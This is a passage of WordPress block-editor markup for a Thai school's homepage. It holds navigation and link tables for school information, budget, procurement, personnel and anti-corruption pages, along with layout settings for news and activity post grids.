gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 